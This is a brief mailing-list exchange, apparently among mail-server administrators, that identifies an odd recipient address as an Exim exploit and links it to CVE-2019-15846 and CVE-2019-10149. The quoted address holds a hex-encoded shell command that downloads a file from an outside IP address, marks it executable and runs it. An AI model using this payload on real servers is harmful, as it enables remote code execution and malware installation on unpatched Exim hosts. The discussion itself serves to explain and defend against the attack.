Kevin A. McGrail:
>
> On 3/12/2020 4:40 PM, kris_h wrote:
> > root+${run{x2Fbinx2Fsht-ctx22wgetx20103.11.228.92x2fssx20-Osxsx3bchmodx20x2bxx20sxsx3b.x2fsxsx22}}@localhost
>
> It's an exim exploit. See CVE-2019-15846.The above is very similar to the Exim exploit for CVE-2019-10149 in https://www.qualys.com/2019/06/05/cve-2019-10149/return-wizard-rce-exim.txt CVE-2019-15846 is related to a bug in Exim SNI support. Wietse
